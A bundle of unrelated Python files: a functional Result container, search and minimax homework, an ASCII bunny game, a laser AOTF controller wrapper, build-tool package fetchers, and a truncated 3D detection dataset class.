... return Success(string + 'b')
...
>>> Success('a').bind(bindable) == Success('ab')
True
"""
return function(self._inner_value)
def fix(self, function):
"""
Returns the '_Success' instance that was used to call the method.
.. code:: python
>>> def fixable(arg: str) -> str:
... return 'ab'
...
>>> Success('a').fix(fixable) == Success('a')
True
"""
return self
def rescue(self, function):
"""
Returns the '_Success' instance that was used to call the method.
.. code:: python
>>> def rescuable(arg: str) -> Result[str, str]:
... return Success(arg + 'b')
...
>>> Success('a').rescue(rescuable) == Success('a')
True
"""
return self
def alt(self, function):
"""
Returns the '_Success' instance that was used to call the method.
.. code:: python
>>> def altable(arg: str) -> Result[str, str]:
... return Success(arg + 'b')
...
>>> Success('a').alt(altable) == Success('a')
True
"""
return self
def value_or(self, default_value):
"""
Returns the value if we deal with '_Success' or default otherwise.
.. code:: python
>>> Success(1).value_or(2)
1
"""
return self._inner_value
def unwrap(self):
"""
Returns the unwrapped value from the inside of this container.
.. code:: python
>>> Success(1).unwrap()
1
"""
return self._inner_value
def failure(self):
"""
Raises an exception, since it does not have an error inside.
.. code:: python
>>> Success(1).failure()
Traceback (most recent call last):
...
returns.primitives.exceptions.UnwrapFailedError
"""
raise UnwrapFailedError(self)
Result.success_type = _Success
Result.failure_type = _Failure
def Success( # noqa: N802
inner_value: _ValueType, # type: ignore
) -> Result[_ValueType, NoReturn]:
"""Public unit function of protected `_Success` type."""
return _Success(inner_value)
def Failure( # noqa: N802
inner_value: _ErrorType, # type: ignore
) -> Result[NoReturn, _ErrorType]:
"""Public unit function of protected `_Failure` type."""
return _Failure(inner_value)
@overload
def safe( # type: ignore
function: Callable[..., Coroutine[_FirstType, _SecondType, _ValueType]],
) -> Callable[
...,
Coroutine[_FirstType, _SecondType, Result[_ValueType, Exception]],
]:
"""Case for async functions."""
@overload
def safe(
function: Callable[..., _ValueType],
) -> Callable[..., Result[_ValueType, Exception]]:
"""Case for regular functions."""
def safe(function): # noqa: C901
"""
Decorator to covert exception throwing function to 'Result' container.
Should be used with care, since it only catches 'Exception' subclasses.
It does not catch 'BaseException' subclasses.
Supports both async and regular functions.
>>> @safe
... def might_raise(arg: int) -> float:
... return 1 / arg
...
>>> might_raise(1) == Success(1.0)
True
>>> isinstance(might_raise(0), _Failure)
True
"""
if iscoroutinefunction(function):
async def decorator(*args, **kwargs): # noqa: WPS430
try:
return Success(await function(*args, **kwargs))
except Exception as exc:
return Failure(exc)
else:
def decorator(*args, **kwargs): # noqa: WPS430
try:
return Success(function(*args, **kwargs))
except Exception as exc:
return Failure(exc)
return wraps(function)(decorator)
|
import util
"""
Data sturctures we will use are stack, queue and priority queue.
Stack: first in last out
Queue: first in first out
collection.push(element): insert element
element = collection.pop() get and remove element from collection
Priority queue:
pq.update('eat', 2)
pq.update('study', 1)
pq.update('sleep', 3)
pq.pop() will return 'study' because it has highest priority 1.
"""
"""
problem is a object has 3 methods related to search state:
problem.getStartState()
Returns the start state for the search problem.
problem.isGoalState(state)
Returns True if and only if the state is a valid goal state.
problem.getChildren(state)
For a given state, this should return a list of tuples, (next_state,
step_cost), where 'next_state' is a child to the current state,
and 'step_cost' is the incremental cost of expanding to that child.
"""
def myDepthFirstSearch(problem):
visited = {}
frontier = util.Stack()
frontier.push((problem.getStartState(), None))
while not frontier.isEmpty():
state, prev_state = frontier.pop()
if problem.isGoalState(state):
solution = [state]
while prev_state != None:
solution.append(prev_state)
prev_state = visited[prev_state]
return solution[::-1]
if state not in visited:
visited[state] = prev_state
for next_state, step_cost in problem.getChildren(state):
frontier.push((next_state, state))
return []
def myBreadthFirstSearch(problem):
# YOUR CODE HERE
visited = {}
frontier = util.Queue()
frontier.push((problem.getStartState(), None))
while not frontier.isEmpty():
state, prev_state = frontier.pop()
if problem.isGoalState(state):
solution = [state]
while prev_state != None:
solution.append(prev_state)
prev_state = visited[prev_state]
return solution[::-1]
if state not in visited:
visited[state] = prev_state
for next_state, step_cost in problem.getChildren(state):
frontier.push((next_state, state))
#util.raiseNotDefined()
return []
def myAStarSearch(problem, heuristic):
# YOUR CODE HERE
frontier = util.PriorityQueue()
start = [problem.getStartState(), heuristic(problem.getStartState()), []]
p = 0
frontier.push(start, p) # queue push at index_0
closed = []
while not frontier.isEmpty():
[state, cost, path] = frontier.pop()
# print(state)
if problem.isGoalState(state):
# print(path)
return path+[state] # here is a deep first algorithm in a sense
if state not in closed:
closed.append(state)
for child_state, child_cost in problem.getChildren(state):
new_cost = cost + child_cost
new_path = path + [state]
frontier.push([child_state, new_cost, new_path], new_cost + heuristic(child_state))
#util.raiseNotDefined()
return []
"""
Game state has 4 methods we can use.
state.isTerminated()
Return True if the state is terminated. We should not continue to search if the state is terminated.
state.isMe()
Return True if it's time for the desired agent to take action. We should check this function to determine whether an agent should maximum or minimum the score.
state.getChildren()
Returns a list of legal state after an agent takes an action.
state.evaluateScore()
Return the score of the state. We should maximum the score for the desired agent.
"""
class MyMinimaxAgent():
def __init__(self, depth):
self.depth = depth
def minimax(self, state, depth):
if depth==0 or state.isTerminated():
return None, state.evaluateScore()
best_state, best_score = None, -float('inf') if state.isMe() else float('inf')
def Max_s(a,b,c,d):
if(a>c):
return a,b
else:
return c,d
def Min_s(a,b,c,d):
if(a<c):
return a,b
else:
return c,d
for child in state.getChildren():
# YOUR CODE HERE
#util.raiseNotDefined()
if state.isMe():
ghost,min_score=self.minimax(child,depth)
best_score,best_state=Max_s(best_score,best_state,min_score,child)
elif child.isMe():
agent,max_score=self.minimax(child,depth-1)
best_score,best_state=Min_s(best_score,best_state,max_score,child)
else:
ghost,min_score=self.minimax(child,depth)
best_score,best_state=Min_s(best_score,best_state,min_score,child)
return best_state, best_score
def getNextState(self, state):
best_state, _ = self.minimax(state, self.depth)
return best_state
class MyAlphaBetaAgent():
def __init__(self, depth):
self.depth = depth
def minimax(self, state, depth,a,b):
if depth==0 or state.isTerminated():
return None, state.evaluateScore()
best_state, best_score = None, -float('inf') if state.isMe() else float('inf')
def Max_s(a,b,c,d):
if(a>c):
return a,b
else:
return c,d
def Min_s(a,b,c,d):
if(a<c):
return a,b
else:
return c,d
for child in state.getChildren():
# YOUR CODE HERE
#util.raiseNotDefined()
if state.isMe():
ghost,min_score=self.minimax(child,depth,a,b)
best_score,best_state=Max_s(best_score,best_state,min_score,child)
if best_score > b:
return best_state, best_score
a = max(a, best_score)
elif child.isMe():
agent,max_score=self.minimax(child,depth-1,a,b)
best_score,best_state=Min_s(best_score,best_state,max_score,child)
if best_score < a:
return best_state, best_score
b = min(b, best_score)
else:
ghost,min_score=self.minimax(child,depth,a,b)
best_score,best_state=Min_s(best_score,best_state,min_score,child)
if best_score < a:
return best_state, best_score
b = min(b, best_score)
return best_state, best_score
def getNextState(self, state):
# YOUR CODE HERE
#util.raiseNotDefined()
best_state, _ = self.minimax(state, self.depth,-float('inf'), float('inf'))
return best_state
|
<gh_stars>0
#!/usr/bin/env python
import time
import os
import platform
def clearScreen():
"""#Method for clearing the screen"""
if platform.system() == 'Windows':
os.system('cls')
else:
os.system('clear')
clearScreen()
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("@@@ THE BUNNY GAME @@@")
print("@@@ This is a simple program i wipped up, you could @@@")
print("@@@ call it a game, i suppose. No its not a game. @@@")
print("@@@ don't call it that, EVER. Oh well this not game @@@")
print("@@@ has 5 err i mean 4 commands, its pretty self @@@")
print("@@@ explanitory. just play it. If this program closes, @@@")
print("@@@ you lose @@@")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
# This just says wait intil enter is pressed
wait = input("\n Press enter to continue ...")
clearScreen()
loop = 0
while loop < 1:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
time.sleep(1.5)
print("What do you want to do with it?")
print(" 1) Pet")
print(" 2) Poke")
print(" 3) Tell Joke")
print(" 4) Steal nose")
choice = int(input("Choice: "))
clearScreen()
if choice == 1:
time.sleep(1.5)
print(" (\__/) Bunny like pets. Now let me sleep.")
print(" ( -.-) That means leave. ")
print(" C(\")(\") ")
time.sleep(5)
print(" umm, I think its best to do what it says.... ")
wait = input("\n Press enter to continue ...")
clearScreen()
elif choice == 2:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" (\__/)")
print(" ( 0.0)")
print(" C(\")(\")")
print(" WHO STOLE MY CARROTS???")
print(" I WILL DESTROY THE WOLRD")
print(" MWAHAHA")
time.sleep(2.5)
count = 10
def countdown(count):
while (count >= 0):
clearScreen()
print(count)
count -= 1
time.sleep(1)
countdown(10)
clearScreen()
print("SOMEONE POKED THE BUNNY. THE WORLD IS OVER.")
print("Guess the bunny beat those terrorists to it...")
break
elif choice == 3:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
time.sleep(1.5)
print(" random joke im to lazy to think of")
time.sleep(3)
clearScreen()
print(" (\__/) gasp")
print(" ( 0.0)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" (\__/) Giggle, lol")
print(" ( *.*)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" You made the bunny laugh, awwww cute.")
wait = input("\n Press enter to continue ...")
clearScreen()
elif choice == 4:
print(" (\__/)")
print(" ( -.-)")
print(" C(\")(\")")
print(" hey bunny")
time.sleep(3)
clearScreen()
print(" (\__/) ?")
print(" ( o.o)")
print(" C(\")(\")")
time.sleep(3)
clearScreen()
print(" (\__/) ?")
print(" ( o o)")
print(" C(\")(\")")
print(" I got your nose")
time.sleep(3)
clearScreen()
print(" (\__/) AHHHHH!!")
print(" ( o o)")
print(" C(\")(\")")
time.sleep(4)
clearScreen()
print("You stole the bunny's nose. why did you do that??? \nWhy??")
time.sleep(3)
wait = input("\n Press enter")
clearScreen()
break
elif choice == 5:
name = "carl"
while name != "bunny":
name = input("Name: ")
if name == "bunny":
clearScreen()
print("Congratulations! you have won the game!\n")
print("When i first made the game a song played here")
print("I did not include it for copyright reasons."
"Thanks for playing")
wait = input("\n Press enter")
clearScreen()
loop = 1
else:
print("EXTERMANATE!!!, wait sorry WRONG USER")
|
# A python wrapper for Fianium supercontinuum laser coupled with AOTF controller
# Original code by <NAME>
# Adapted by <NAME>
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
import ctypes
import types
import time
import sys
import numpy as np
from time import sleep
d = ctypes.cdll.LoadLibrary('AotfLibrary.dll')
import atexit, string
class fianium_aotf():
def __init__(self):
self.aotf_serial_number = "***************"
self.aotf_serial_number_2 = "*************"
#Initialize aotf power as well as vis/nir channel id
self.last_power = 0.
self._id_ir = 0
self._id_vis = 0
self.vis_on = False
self.ir_on = False
#Parameters used to calculate RF frequency of aotf controller
self.aotf_poly_coef_vis = [-6.82179219e-17,3.27832863e-13,-6.73661923e-10,7.68686873e-07,-5.27585574e-04, 2.18972280e-01, -5.14687930e+01, 5.48569847e+03]
self.aotf_poly_coef_nir = [1.25692660e-17,-7.01326532e-14,1.65065114e-10,-2.11753075e-07,1.59015648e-04,-6.90936212e-02,1.55775592e+01,-1.19330653e+03]
self.aotf_poly_vis = np.poly1d(self.aotf_poly_coef_vis)
self.aotf_poly_nir = np.poly1d(self.aotf_poly_coef_nir)
self.MAX_POWER = 5000 #Max ATOF power
self.red_edge = 800. #Max wavelength for visible channel
atexit.register(self._close)
def get_serial(self, prefix):
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
ser_cmd = "Boardid serial \r"
d.AotfWrite(prefix, len(ser_cmd), ser_cmd)
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
ret = ''
for i in range(0, 1000):
time.sleep(0.002)
if d.AotfIsReadDataAvailable(prefix):
val = d.AotfRead(prefix, ctypes.sizeof(strbuf), ctypes.byref(strbuf), ctypes.byref(bytesread))
ret += strbuf.value
print "sn ", ret
return ret
def _open(self):
#Connect to AOTF controller
self._id_vis = d.AotfOpen(0)
ser1 = self.get_serial(self._id_vis)
self._id_ir = d.AotfOpen(1)
ser2 = self.get_serial(self._id_ir)
if (self.aotf_serial_number in ser1) or (self.aotf_serial_number_2 in ser2):
pass
elif (self.aotf_serial_number in ser2) or (self.aotf_serial_number_2 in ser1):
self._id_ir, self._id_vis = self._id_vis, self._id_ir
else:
raise ValueError('AOTF open failed: can not find device with serial number '+self.aotf_serial_number)
return False
def _close(self):
d.AotfClose(self._id_ir)
d.AotfClose(self._id_vis)
def send_cmd(self, cmd, prefix):
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
for i in range(100):
sleep(0.000001)
if d.AotfIsReadDataAvailable(prefix):
ret = d.AotfRead(prefix, ctypes.sizeof(strbuf), ctypes.byref(strbuf), ctypes.byref(bytesread))
d.AotfWrite(prefix, len(cmd), cmd)
time.sleep(0.020)
strbuf = ctypes.create_string_buffer(1)
strbuf = ctypes.c_char()
bytesread = ctypes.c_uint()
ret = ''
for i in range(100):
sleep(0.000001)
if d.AotfIsReadDataAvailable(prefix):
ret = d.AotfRead(prefix, ctypes.sizeof(strbuf), ctypes.byref(strbuf), ctypes.byref(bytesread))
return ret
def enable(self):
s = 'dau en\r dau gain 0 255\r'
self.send_cmd(s, self._id_ir)
self.send_cmd(s, self._id_vis)
def set_wlen(self,wlen,aotf=None):
#Set laser wavelength
if "vis" in aotf:
freq = self.aotf_poly_vis(wlen)
s = 'dds freq 0 %0.3f \r' % (freq)
self.send_cmd(s, self._id_vis)
self.vis_on = True
elif "nir" in aotf:
freq = self.aotf_poly_nir(wlen)
print "freq = ", freq
s = 'dds freq 0 %0.3f \r' % (freq)
self.send_cmd(s, self._id_ir)
self.ir_on = True
def set_pwr(self,power,aotf=None):
#Set laser power
self.last_power = power
if "vis" in aotf:
val = int(power*self.MAX_POWER/100.)
s = 'dds amplitude 0 %d \r' % (val)
self.send_cmd(s, self._id_vis)
elif "nir" in aotf:
val = int(power*self.MAX_POWER/100.)
s = 'dds amplitude 0 %d \r' % (val)
self.send_cmd(s, self._id_ir)
if __name__ == '__main__':
aotf = fianium_aotf()
aotf._open()
print "Aotf open"
aotf.enable()
print "Aotf enable"
time.sleep(0.5)
aotf.set_wlen(450, aotf="vis")
print "Aotf vis set wavelength"
aotf.set_pwr(100, aotf="vis")
print "Aotf vis set power"
aotf.set_wlen(700, aotf="nir")
print "Aotf nir set wavelength"
aotf.set_pwr(0, aotf="nir")
print "Aotf ir set power"
|
#!/usr/bin/env python3
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import glob
import hashlib
import logging
import os
import platform
import shlex
import shutil
import subprocess
import tempfile
from collections import namedtuple
from configure_buck import find_project_root, update_config
from constants import BUCKFILE, BUCKCONFIG
from formatting import readable_check_call
from helpers import BuckitException
from textwrap import indent, dedent
PipPythonSettings = namedtuple(
'PipPythonSettings', [
'virtualenv_command',
'virtualenv_root',
'pip_package',
'pip_version',
'prefix_subdir',
]
)
class CachedFetcher:
def should_fetch(self, destination, force):
src_dest = os.path.join(destination, 'src')
return not os.path.exists(src_dest) or force
def populate_cache(self, destination, use_proxy):
raise BuckitException('Not implemented')
def fetch(self, project_root, destination, use_proxy):
destination = os.path.join(destination, 'src')
if os.path.isdir(destination):
return
# Make sure that our parent dir exists
if not os.path.exists(os.path.split(destination)[0]):
os.makedirs(os.path.split(destination)[0], 0o0755)
yarn_cache = os.path.join(os.path.expanduser('~'), '.cache', 'yarn')
if not os.path.exists(yarn_cache):
yarn_cache = os.path.join(os.path.expanduser('~'), '.yarn-cache')
if not os.path.exists(yarn_cache):
os.makedirs(yarn_cache)
clean_package_name = self.package_name.replace('/',
'_').replace('\\', '_')
clean_version = self.version().replace('/', '_').replace('\\', '_')
cache_dir_name = 'buckit-fetch-{}-{}'.format(
clean_package_name, clean_version
)
cache_dir = os.path.join(yarn_cache, cache_dir_name)
if not os.path.exists(cache_dir):
logging.debug(
"{bold}Downloading %s to cache directory at %s{clear}",
self.package_name, cache_dir
)
self.populate_cache(cache_dir, use_proxy)
tmp_destination = tempfile.mkdtemp(dir=os.path.split(destination)[0])
logging.debug(
"{bold}Cached download at %s exists, copying to %s{clear}",
cache_dir, tmp_destination
)
# Dir needs to not exist for copytree, but we want mkdtemp for guaranteed
# unique temp dir next to destination
tmp_subdir = os.path.join(
tmp_destination, os.path.split(destination)[1]
)
try:
shutil.copytree(cache_dir, tmp_subdir, symlinks=True)
shutil.move(tmp_subdir, destination)
finally:
if os.path.exists(tmp_destination):
shutil.rmtree(tmp_destination)
class GitFetcher(CachedFetcher):
def __init__(self, package_name, json_file, url, commit, tag):
if bool(commit) == bool(tag):
raise BuckitException(
"{}: Either the commit, or the tag must be specified",
json_file)
self.package_name = package_name
self.url = url
self.commit = commit
self.tag = tag
def version(self):
return self.commit or self.tag
def populate_cache(self, destination, use_proxy):
env = dict(os.environ)
if not use_proxy:
for var in ('https_proxy', 'http_proxy'):
if var in env:
del env[var]
tmp_dir = tempfile.mkdtemp(dir=os.path.split(destination)[0])
out_dir = os.path.join(tmp_dir, 'outdir')
try:
if self.commit:
# Github and the like don't seem to let you do git fetch <sha>
# so we have to do a heavy weight clone
readable_check_call(
['git', 'clone', '--recursive', self.url, out_dir],
'cloning repo'
)
readable_check_call(
['git', 'checkout', self.commit],
'checking out specific commit',
cwd=out_dir
)
else:
if platform.system() == 'Darwin':
# For now short circuit shallow submodules on osx
# because things are terrible there.
shallow_submodules = []
else:
shallow_submodules = ['--shallow-submodules']
readable_check_call(
[
'git',
'clone',
'--branch',
self.tag,
'--depth',
'1',
'--recursive',
] + shallow_submodules + [self.url, out_dir], 'cloning repo'
)
logging.info(
"Checked out %s to %s, moving it to %s", self.url, out_dir,
destination
)
shutil.move(out_dir, destination)
finally:
shutil.rmtree(tmp_dir)
class HttpTarballFetcher(CachedFetcher):
HASH_BUFFER_SIZE = 64 * 1024
def __init__(self, package_name, json_file, url, sha256):
self.package_name = package_name
self.url = url
self.sha256 = sha256
def version(self):
return self.sha256
def populate_cache(self, destination, use_proxy):
env = dict(os.environ)
if not use_proxy:
for var in ('https_proxy', 'http_proxy'):
if var in env:
del env[var]
tmp_dir = tempfile.mkdtemp(dir=os.path.split(destination)[0])
tmp_file = os.path.join(tmp_dir, 'output_file')
try:
readable_check_call(
['curl', self.url, '-L', '-o', tmp_file],
'fetching {}'.format(self.url)
)
self.check_hash(tmp_file)
readable_check_call(
['tar', 'xf', tmp_file, '-C', tmp_dir],
'extracting {}'.format(tmp_file)
)
os.remove(tmp_file)
main_dir = glob.glob(os.path.join(tmp_dir, '*'))[0]
logging.info("{bold}Moving %s to %s", main_dir, destination)
shutil.move(main_dir, destination)
finally:
shutil.rmtree(tmp_dir)
def check_hash(self, filename):
file_hash = hashlib.sha256()
with open(filename, 'rb') as fin:
while True:
data = fin.read(self.HASH_BUFFER_SIZE)
if not data:
break
file_hash.update(data)
if file_hash.hexdigest() != self.sha256:
raise BuckitException(
'SHA256 of downloaded file didn\'t match! Expected {}, got {}',
self.sha256, file_hash.hexdigest())
class PipFetcher:
def __init__(
self, package_name, json_file, pip2_package, pip2_version, pip3_package,
pip3_version, main_rule, buck_deps, python_settings
):
self.package_name = package_name
self.main_rule = main_rule
self.buck_deps = buck_deps
self.python2 = None
self.python3 = None
if pip2_package and python_settings.use_python2:
self.python2 = PipPythonSettings(
python_settings.python2_virtualenv_command,
python_settings.python2_virtualenv_root,
pip2_package,
pip2_version,
'py2',
)
if pip3_package and python_settings.use_python3:
self.python3 = PipPythonSettings(
python_settings.python3_virtualenv_command,
python_settings.python3_virtualenv_root,
pip3_package,
pip3_version,
'py3',
)
self.python2_files = {"srcs": {}, "bins": {}}
self.python3_files = {"srcs": {}, "bins": {}}
if not main_rule:
raise BuckitException(
'A main_rule attribute must be set in {}', json_file)
def should_fetch(self, destination, force):
buckfile = os.path.join(destination, BUCKFILE)
return not os.path.exists(buckfile) or force
def fetch(self, project_root, destination, use_proxy):
env = dict(os.environ)
if not use_proxy:
for var in ('https_proxy', 'http_proxy'):
if var in env:
del env[var]
if not os.path.exists(destination):
os.makedirs(destination)
if self.python2:
self.python2_files = self.install_and_get_files(
self.python2,
'pip',
env,
)
self.setup_install_prefix(self.python2, destination)
if self.python3:
self.python3_files = self.install_and_get_files(
self.python3, 'pip', env
)
self.setup_install_prefix(self.python3, destination)
buckfile = os.path.join(destination, BUCKFILE)
with open(buckfile, 'w') as fout:
fout.write('\n'.join(self.buckfile()))
if self.python2 or self.python3:
read_only_props = {'project': {'read_only_paths': []}}
project_root = find_project_root(destination)
relative_path = os.path.relpath(destination, project_root)
if self.python2:
read_only_props['project']['read_only_paths'].append(
os.path.join(relative_path, 'py2')
)
if self.python3:
read_only_props['project']['read_only_paths'].append(
os.path.join(relative_path, 'py3')
)
read_only_props['project']['read_only_paths'] = ','.join(
read_only_props['project']['read_only_paths']
)
buckconfig = os.path.join(project_root, BUCKCONFIG)
update_config(project_root, buckconfig, read_only_props)
def buckfile(self):
ret = []
py2_srcs = ""
py3_srcs = ""
if self.python2:
py2_srcs = '\n'.join(
[
'r"{}": r"{}",'.format(
module_path,
os.path.join(self.python2.prefix_subdir, venv_relative)
)
for venv_relative, module_path in self.python2_files["srcs"]
.items()
]
)
if self.python3:
py3_srcs = '\n'.join(
[
'r"{}": r"{}",'.format(
module_path,
os.path.join(self.python3.prefix_subdir, venv_relative)
)
for venv_relative, module_path in self.python3_files["srcs"]
.items()
]
)
deps = '\n'.join(['"{}",'.format(dep) for dep in self.buck_deps])
ret.append(
dedent(
"""
__py2_srcs = {{
{py2_srcs}
}}
__py3_srcs = {{
{py3_srcs}
}}
__preferred_srcs = __py3_srcs
if read_config('buckit', 'python_version', '') == '2':
__preferred_srcs = __py2_srcs
python_library(
name="{name}",
srcs=__preferred_srcs,
platform_srcs=[
('py2.*', __py2_srcs),
('py3.*', __py3_srcs),
],
deps=[
{deps}
],
visibility=['PUBLIC'],
)
"""
).format(
name=self.main_rule,
py2_srcs=indent(py2_srcs, ' ' * 4),
py3_srcs=indent(py3_srcs, ' ' * 4),
deps=indent(deps, ' ' * 8)
)
)
for name, path in self.python3_files["bins"].items():
ret.append(
dedent(
"""
if read_config('buckit', 'python_version', '3') == '3':
sh_binary(
name="{name}",
main=r"{path}",
)
"""
).format(name=name, path=path)
)
for name, path in self.python2_files["bins"].items():
ret.append(
dedent(
"""
if read_config('buckit', 'python_version', '3') == '2':
sh_binary(
name="{name}",
main=r"{path}",
)
"""
).format(name=name, path=path)
)
return ret
def parse_pip_output(self, python_settings, output):
found_bins = []
found_files = []
found_files_line = False
location = ''
for line in output.splitlines():
if line == 'Files:':
found_files_line = True
elif line.startswith('Location:'):
location = line.split(':', 2)[1].strip()
elif found_files_line:
if not line.startswith(' '):
found_files_line = False
continue
normalized = os.path.normpath(line.strip())
if normalized.endswith('.py'):
found_files.append(normalized)
elif 'bin' in normalized.split(os.sep):
found_bins.append(normalized)
return self.transform_pip_output(
python_settings, location, found_files, found_bins
)
def transform_pip_output(
self, python_settings, location, found_files, found_bins
):
bins = {}
files = {}
# Get the path relative to the root of the venv so that we can put that
# in the buck file, and remap it to the path within system-packages
# so that you can import the module properly
for path in found_files:
full_path = os.path.normpath(os.path.join(location, path))
if full_path.startswith(python_settings.virtualenv_root + os.sep):
venv_relative_path = full_path[
len(python_settings.virtualenv_root) + len(os.sep):
]
else:
venv_relative_path = path
files[venv_relative_path] = path
for path in found_bins:
full_path = os.path.normpath(os.path.join(location, path))
if full_path.startswith(python_settings.virtualenv_root + os.sep):
venv_relative_path = full_path[
len(python_settings.virtualenv_root) + len(os.sep):
]
else:
venv_relative_path = path
bins[os.path.split(path)[1]] = venv_relative_path
return {"srcs": files, "bins": bins}
def install_and_get_files(self, python_settings, pip_command, env):
# TODO: Windows
activate_path = os.path.join(
python_settings.virtualenv_root, 'bin', 'activate'
)
if (not os.path.exists(python_settings.virtualenv_root) or
not os.path.exists(activate_path)):
logging.info(
"Virtualenv at %s does not exist, creating",
python_settings.virtualenv_root
)
readable_check_call(
python_settings.virtualenv_command +
[python_settings.virtualenv_root],
"installing python virtual env",
env=env,
)
package = shlex.quote(
python_settings.pip_package + (python_settings.pip_version or '')
)
command = (
"source bin/activate && {pip} install -I {package} && "
"{pip} show -f {package}"
).format(
pip=pip_command, package=package
)
logging.info(
"Installing %s via pip with %s in %s", package, command,
python_settings.virtualenv_root
)
proc = subprocess.Popen(
args=command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=python_settings.virtualenv_root,
shell=True,
env=env,
)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
logging.error(
"{red}Error installing into virtualenv:{clear}\n"
"stdout: %sstderr: %s\nReturn code %s\n", stdout, stderr,
proc.returncode
)
raise BuckitException(
"Could not install virtualenv at {}",
python_settings.virtualenv_root)
stdout = stdout.decode('utf-8')
return self.parse_pip_output(python_settings, stdout)
def setup_install_prefix(self, python_settings, destination):
platform_install_prefix = os.path.join(
destination, python_settings.prefix_subdir
)
if not os.path.exists(destination):
os.makedirs(destination)
if not os.path.exists(platform_install_prefix):
# TODO: Windows
relative_install_prefix = os.path.relpath(
os.path.realpath(
python_settings.virtualenv_root,
),
os.path.realpath(os.path.split(platform_install_prefix)[0]),
)
logging.debug(
"%s does not exist. Linking it to %s via %s",
platform_install_prefix, python_settings.virtualenv_root,
relative_install_prefix
)
os.symlink(
relative_install_prefix,
platform_install_prefix,
)
|
import os.path as osp
import mmcv
import numpy as np
from mmcv.parallel import DataContainer as DC
from torch.utils.data import Dataset
from .registry import DATASETS
from .transforms import (ImageTransform, PointTransform, Numpy2Tensor)
from .utils import to_tensor, random_scale
from .extra_aug import ExtraAugmentation
@DATASETS.register_module
class Vision3DDataset(Dataset):
"""Custom dataset for detection.
Annotation format:
[
{
'filename': 'a.jpg',
'url': 'http://dataplatform.fabu.ai/xxxx',
'width': 1920,
'height': 1200,
'ann': {
'corners': <np.ndarray> (n, 6, 2),
'classes': <np.ndarray> (n),
'poses': <np.ndarray> (n),
'corners_ignore': <np.ndarray> (n, 6, 2),
'bboxes': <np.ndarray> (n,4),
}
},
...
]
The `ann` field is optional for testing.
"""
CLASSES = [
'__background__', 'car', 'bus', 'truck', 'person', 'bicycle',
'tricycle', 'block'
]
def __init__(self,
ann_file,
img_prefix,
img_scale,
img_norm_cfg,
multiscale_mode='value',
size_divisor=None,
flip_ratio=0,
with_ignore=False,
extra_aug=None,
resize_keep_ratio=True,
sample_file=None,
num_classes=8,
test_mode=False):
super(Vision3DDataset, self).__init__()
# prefix of images path
self.img_prefix = img_prefix
self.name = osp.basename(ann_file).split('.')[0]
# load annotations (and proposals)
self.raw_annotations = self.load_annotations(ann_file)
# support dict or list
if isinstance(self.raw_annotations, list):
self.ids = range(len(self.raw_annotations))
elif isinstance(self.raw_annotations, dict):
if sample_file is not None and osp.isfile(sample_file):
self.ids = mmcv.load(sample_file, encoding='latin1')
else:
self.ids = sorted(list(self.raw_annotations.keys()))
else:
raise Exception("Unrecognized type of annotations: {}".format(
type(self.raw_annotations)))
# filter images with no annotation during training
if not test_mode:
self._filter_imgs()
# (long_edge, short_edge) or [(long1, short1), (long2, short2), ...]
self.img_scales = img_scale if isinstance(img_scale,
list) else [img_scale]
assert mmcv.is_list_of(self.img_scales, tuple)
# normalization configs
self.img_norm_cfg = img_norm_cfg
# multi-scale mode (only applicable for multi-scale training)
self.multiscale_mode = multiscale_mode
assert multiscale_mode in ['value', 'range']
# flip ratio
self.flip_ratio = flip_ratio
assert flip_ratio >= 0 and flip_ratio <= 1
# padding border to ensure the image size can be divided by
# size_divisor (used for FPN)
self.size_divisor = size_divisor
# some datasets provide bbox annotations as ignore/crowd/difficult,
self.with_ignore = with_ignore
# in test mode or not
self.test_mode = test_mode
# set group flag for the sampler
if not self.test_mode:
self._set_group_flag()
# transforms
self.img_transform = ImageTransform(
size_divisor=self.size_divisor, **self.img_norm_cfg)
self.point_transform = PointTransform()
self.numpy2tensor = Numpy2Tensor()
# if use extra augmentation
if extra_aug is not None:
self.extra_aug = ExtraAugmentation(**extra_aug)
else:
self.extra_aug = None
# image rescale if keep ratio
self.resize_keep_ratio = resize_keep_ratio
self.num_classes = num_classes
def __len__(self):
return len(self.ids)
def load_annotations(self, ann_file):
return mmcv.load(ann_file, encoding='latin1')
def get_ann_info(self, idx):
key = self.ids[idx]
return self.raw_annotations[key]['ann']
def get_img_info(self, idx):
key = self.ids[idx]
return self.raw_annotations[key]
def _filter_imgs(self, min_size=32):
"""Filter images too small."""
valid_inds = []
for idx in self.ids:
img_info = self.raw_annotations[idx]
if min(img_info['width'], img_info['height']) >= min_size:
valid_inds.append(idx)
self.ids = valid_inds
def _set_group_flag(self):
"""Set flag according to image aspect ratio.
Images with aspect ratio greater than 1 will be set as group 1,
otherwise group 0.
"""
self.flag = np.zeros(len(self), dtype=np.uint8)
for i in range(len(self)):
img_info = self.get_img_info(i)
if img_info['width'] / img_info['height'] > 1:
self.flag[i] = 1
def _rand_another(self, idx):
pool = np.where(self.flag == self.flag[idx])[0]
return np.random.choice(pool)
def __getitem__(self, idx):
if self.test_mode:
return self.prepare_test_img(idx)
while True:
data = self.prepare_train_img(idx)
if data is None:
idx = self._rand_another(idx)
continue
